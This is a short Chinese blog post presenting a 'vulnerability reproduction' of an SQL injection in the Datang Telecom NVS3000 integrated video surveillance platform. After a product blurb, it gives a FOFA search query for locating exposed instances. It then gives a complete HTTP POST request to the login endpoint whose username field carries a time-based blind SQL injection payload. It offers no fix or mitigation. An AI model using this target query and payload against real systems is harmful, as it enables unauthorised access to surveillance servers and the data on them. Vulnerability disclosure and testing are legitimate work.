本文主要是介绍【漏洞复现】大唐电信NVS3000综合视频监控平台 sql注入漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
大唐电信NVS3000综合视频监控平台是一种基于宽带网络的图像监控、存储、管理的远程视频监控系统。该系统结合了电信、网通等运营企业、或其它行业、企事业单位的内部网络,实现了跨域、大范围的统一监控、存储、管理、资源共享,为行业管理决策者提供全新、直观、扩大视觉和听觉范围的管理工具,提高工作绩效。
0x02 漏洞概述
大唐电信NVS3000综合视频监控平台存在sql注入,攻击者可以通过该漏洞获取服务器敏感信息。
0x03 测绘语句
fofa: body="综合视频监控平台" && body="验证码"0x04 漏洞复现
漏洞复现:
POST /nvsthird/ocxUserLogin HTTP/1.1Host:Content-Type: application/json{"userName":"asda' AND (SELECT 4094 FROM (SELECT(SLEEP(4)))hyJC) AND 'FYBK'='FYBK","password":"sadsa","code":"67a5"}这篇关于【漏洞复现】大唐电信NVS3000综合视频监控平台 sql注入漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
